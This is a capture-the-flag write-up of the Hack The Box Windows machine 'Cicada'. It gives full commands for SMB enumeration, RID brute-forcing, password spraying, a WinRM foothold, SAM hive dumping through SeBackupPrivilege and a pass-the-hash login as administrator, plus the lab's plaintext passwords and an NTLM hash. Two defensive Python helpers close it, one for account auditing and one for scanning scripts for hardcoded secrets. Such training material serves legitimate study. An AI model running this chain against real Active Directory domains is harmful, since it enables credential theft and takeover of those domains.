Cicada machine notes

Overview

HTB machine: Cicada
Machine address: https://app.hackthebox.com/machines/Cicada

An interesting and simple Windows box. It relies on information enumeration several times over, using each newly discovered piece of information to get one step closer to root.

1. nmap scan

1) Port scan

-sT: TCP full-connect scan
--min-rate: scan at a minimum rate of 10000
-p-: scan all ports

```
nmap -sT -p- --min-rate 10000 -o ports 10.10.11.35
```

```
Nmap scan report for 10.10.11.35
Host is up (0.39s latency).
Not shown: 65522 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
54435/tcp open  unknown
```

Collect the open ports into a comma-separated list:

```
ports=$(grep open ports | awk -F/ '{print $1}' | paste -sd ,)
```

2) Detailed probe

-sT: TCP full-connect scan
-sV: probe service versions on the open ports
-sC: run the default script set

```
nmap -sT -sV -sC -O -p53,88,135,139,389,445,464,593,636,3268,3269,5985,54435 -o details 10.10.11.35
```

```
Nmap scan report for 10.10.11.35
Host is up (0.35s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-29 15:06:59Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
54435/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 6h59m59s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2024-09-29T15:08:00
|_  start_date: N/A
```

3) Vulnerability script scan

```
nmap --script=vuln -p53,88,135,139,389,445,464,593,636,3268,3269,5985,54435 -o vuln 10.10.11.35
```

```
Nmap scan report for 10.10.11.35
Host is up (0.35s latency).

PORT      STATE    SERVICE
53/tcp    open     domain
88/tcp    open     kerberos-sec
135/tcp   open     msrpc
139/tcp   open     netbios-ssn
389/tcp   open     ldap
445/tcp   open     microsoft-ds
464/tcp   open     kpasswd5
593/tcp   open     http-rpc-epmap
636/tcp   open     ldapssl
|_ssl-ccs-injection: No reply from server (TIMEOUT)
3268/tcp  open     globalcatLDAP
3269/tcp  open     globalcatLDAPssl
|_ssl-ccs-injection: No reply from server (TIMEOUT)
5985/tcp  open     wsman
54435/tcp filtered unknown

Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false
```

2. SMB enumeration

1) smbclient

The target exposes SMB on port 445, so start with anonymous access:

```
smbclient -L 10.10.11.35
Password for [WORKGROUP\kali]:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	DEV             Disk
	HR              Disk
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	SYSVOL          Disk      Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.35 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```

With an empty password the share list is exposed to us. Only the HR share is accessible, so look inside for anything interesting:

```
smbclient '\\10.10.11.35\HR'
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Mar 14 20:29:09 2024
  ..                                  D        0  Thu Mar 14 20:21:29 2024
  Notice from HR.txt                  A     1266  Thu Aug 29 01:31:48 2024

		4168447 blocks of size 4096. 424297 blocks available
smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (0.8 KiloBytes/sec) (average 0.8 KiloBytes/sec)
smb: \>
```

There is a file named Notice from HR.txt. Read it:

```
cat Notice\ from\ HR.txt
Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp
```

It reads like an onboarding email, and it gives us a password: Cicada$M6Corpb*Lp#nZp!8. We do not know the username yet, so use crackmapexec to enumerate the machine's users.

2) crackmapexec

a) Enumerate usernames

```
crackmapexec smb 10.10.11.35 -u dsad -p '' --rid-brute
```

```
SMB  10.10.11.35  445  CICADA-DC  [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB  10.10.11.35  445  CICADA-DC  [+] cicada.htb\dsad:
SMB  10.10.11.35  445  CICADA-DC  [+] Brute forcing RIDs
SMB  10.10.11.35  445  CICADA-DC  498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  500: CICADA\Administrator (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  501: CICADA\Guest (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  502: CICADA\krbtgt (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  512: CICADA\Domain Admins (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  513: CICADA\Domain Users (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  514: CICADA\Domain Guests (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  515: CICADA\Domain Computers (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  516: CICADA\Domain Controllers (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  517: CICADA\Cert Publishers (SidTypeAlias)
SMB  10.10.11.35  445  CICADA-DC  518: CICADA\Schema Admins (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  519: CICADA\Enterprise Admins (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  525: CICADA\Protected Users (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  526: CICADA\Key Admins (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB  10.10.11.35  445  CICADA-DC  571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB  10.10.11.35  445  CICADA-DC  572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB  10.10.11.35  445  CICADA-DC  1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  1101: CICADA\DnsAdmins (SidTypeAlias)
SMB  10.10.11.35  445  CICADA-DC  1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  1103: CICADA\Groups (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  1104: CICADA\john.smoulder (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  1105: CICADA\sarah.dantelia (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  1106: CICADA\michael.wrightson (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  1108: CICADA\david.orelious (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  1109: CICADA\Dev Support (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  1601: CICADA\emily.oscars (SidTypeUser)
```

Filtering the SidTypeUser entries out of the result gives the machine's users:

```
Administrator
Guest
krbtgt
Domain
Protected
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
```

b) Brute-force the credential

Put the users in a file named user and the password in a file named pass:

```
crackmapexec smb 10.10.11.35 -u user -p pass --continue-on-success
```

This yields a valid SMB credential: michael.wrightson:Cicada$M6Corpb*Lp#nZp!8. Check that account's share permissions:

```
crackmapexec smb 10.10.11.35 -u michael.wrightson -p pass --shares
```

A new share, DEV, becomes visible, but this account has no READ permission on it. The account also has no WinRM remote-management access.

c) Further enumeration

Use the known account to enumerate information about the other accounts:

```
crackmapexec smb 10.10.11.35 -u michael.wrightson -p pass --users
```

This reveals another credential: david.orelious:aRt$Lp#7t*VQ!3. Check that user's SMB permissions:

```
crackmapexec smb 10.10.11.35 -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares
```

This user has read permission on DEV. Download its contents with smbclient:

```
smbclient '\\10.10.11.35\DEV' -U david.orelious
Password for [WORKGROUP\david.orelious]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Mar 14 20:31:39 2024
  ..                                  D        0  Thu Mar 14 20:21:29 2024
  Backup_script.ps1                   A      601  Thu Aug 29 01:28:22 2024

		4168447 blocks of size 4096. 423385 blocks available
smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \>
```

Backup_script.ps1 is downloaded. Read it:

```
cat Backup_script.ps1
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
```

Yet another credential: emily.oscars:Q!3Lp#M6b*7t*Vt. Verify WinRM access:

```
crackmapexec winrm 10.10.11.35 -u emily.oscars -p 'Q!3Lp#M6b*7t*Vt'
```

The status is Pwn3d!, which means we can log in.

3. Getting a foothold

1) evil-winrm

```
evil-winrm -i 10.10.11.35 -u emily.oscars -p 'Q!3Lp#M6b*7t*Vt'
```

This gets the user flag.

4. Privilege escalation

Check the current user's privileges:

```
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
```

The current user holds SeBackupPrivilege and SeRestorePrivilege, so we can dump the SAM and SYSTEM hives, extract the administrator's hash, and then use pass-the-hash (PTH) to obtain administrator access.

Create a temp directory under C:\ and run:

```
reg save hklm\sam c:\temp\sam
reg save hklm\system c:\temp\system
```

The dumped sam and system hives are now in c:\temp. Download them to the local machine:

```
download sam
download system
```

Extract the hashes from the SAM:

```
impacket-secretsdump -sam sam -system system local
```

The administrator's NTLM hash is 2b87e7c93a3e8a0ea4a581937016f341. Pass the hash (the PTH attack):

```
evil-winrm -i 10.10.11.35 -u administrator -H 2b87e7c93a3e8a0ea4a581937016f341
```

That gives us root.

Summary

The nmap scan showed SMB on port 445. Enumerating SMB turned up a user password, and from there a set of credentials that allowed WinRM remote management. After logging in, the user turned out to hold SeBackupPrivilege; that privilege was used to dump the hashes, and a PTH attack with the dumped hash gave administrator access.
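The RID-cycling step above filters the SidTypeUser lines by hand. The following added helper (not part of the write-up) does the same filter programmatically and goes a step further, splitting the accounts into built-in (RID below 1000), computer (trailing `$`) and domain-created users, which is the view an account audit wants when judging what a null session exposes. The sample output is a constructed, shortened copy of the listing above.

```python
import re
from collections import defaultdict

# Constructed sample in the format crackmapexec prints for --rid-brute,
# shortened from the full listing in the write-up above.
SAMPLE_OUTPUT = """\
SMB  10.10.11.35  445  CICADA-DC  [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB  10.10.11.35  445  CICADA-DC  [+] cicada.htb\\dsad:
SMB  10.10.11.35  445  CICADA-DC  [+] Brute forcing RIDs
SMB  10.10.11.35  445  CICADA-DC  500: CICADA\\Administrator (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  501: CICADA\\Guest (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  512: CICADA\\Domain Admins (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  1000: CICADA\\CICADA-DC$ (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  1104: CICADA\\john.smoulder (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  1109: CICADA\\Dev Support (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  1601: CICADA\\emily.oscars (SidTypeUser)
"""

# "<rid>: <DOMAIN>\<name> (<SidType...>)" at the end of a result line.
RID_LINE = re.compile(r"\s(\d+):\s+([^\\]+)\\(.+?)\s+\((SidType\w+)\)\s*$")


def parse_rid_brute(text):
    """Return (rid, domain, name, sidtype) tuples for every resolved RID line."""
    entries = []
    for line in text.splitlines():
        m = RID_LINE.search(line)
        if m:
            entries.append((int(m.group(1)), m.group(2), m.group(3), m.group(4)))
    return entries


def classify_users(entries):
    """Keep only SidTypeUser entries and bucket them the way an account audit reads them."""
    buckets = defaultdict(list)
    for rid, _domain, name, sidtype in entries:
        if sidtype != "SidTypeUser":
            continue  # groups and aliases are not logon accounts
        if name.endswith("$"):
            buckets["computer"].append(name)
        elif rid < 1000:
            buckets["builtin"].append(name)  # Administrator, Guest, krbtgt
        else:
            buckets["domain_user"].append(name)
    return dict(buckets)


if __name__ == "__main__":
    for bucket, names in classify_users(parse_rid_brute(SAMPLE_OUTPUT)).items():
        print(f"{bucket}: {', '.join(names)}")
```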
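Both credential leaks on this box came from files sitting on readable shares, and Backup_script.ps1 shows the classic pattern: a literal password fed to ConvertTo-SecureString -AsPlainText. The following added scanner (not part of the write-up) flags that pattern and literal assignments to password-like variables in PowerShell scripts, reporting a redacted value so the report itself does not re-leak the secret. The sample script is constructed with placeholder values modelled on the one above; the Import-Clixml line shows the form that is not flagged.

```python
import re

# Literal passed to ConvertTo-SecureString ... -AsPlainText on one line.
SECURESTRING_LITERAL = re.compile(
    r'ConvertTo-SecureString\s+(?:-String\s+)?(["\'])(.+?)\1[^\n]*-AsPlainText', re.IGNORECASE)
# Literal assigned to a variable whose name suggests a secret.
ASSIGNMENT_LITERAL = re.compile(
    r'\$(\w*(?:pass|pwd|secret|token)\w*)\s*=\s*(["\'])(.+?)\2', re.IGNORECASE)


def redact(secret):
    """Keep only the first character and the length so a finding never repeats the value."""
    return secret[0] + "*" * (len(secret) - 1) if secret else ""


def scan_powershell(text, path="<stdin>"):
    """Return (path, line_no, kind, redacted_value) for each hardcoded secret found."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        m = SECURESTRING_LITERAL.search(line)
        if m:
            findings.append((path, no, "ConvertTo-SecureString -AsPlainText literal", redact(m.group(2))))
            continue
        m = ASSIGNMENT_LITERAL.search(line)
        if m:
            findings.append((path, no, f"literal assigned to ${m.group(1)}", redact(m.group(3))))
    return findings


# Constructed sample modelled on Backup_script.ps1; the secrets are placeholders.
SAMPLE_SCRIPT = r'''
$username = "svc_backup"
$password = ConvertTo-SecureString "NotTheRealPassword1!" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$SmbPassword = 'AlsoNotReal2#'
$safeCred = Import-Clixml -Path "$env:USERPROFILE\backup.cred"
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
'''

if __name__ == "__main__":
    for path, no, kind, value in scan_powershell(SAMPLE_SCRIPT, "Backup_script.ps1"):
        print(f"{path}:{no}: {kind} ({value})")
```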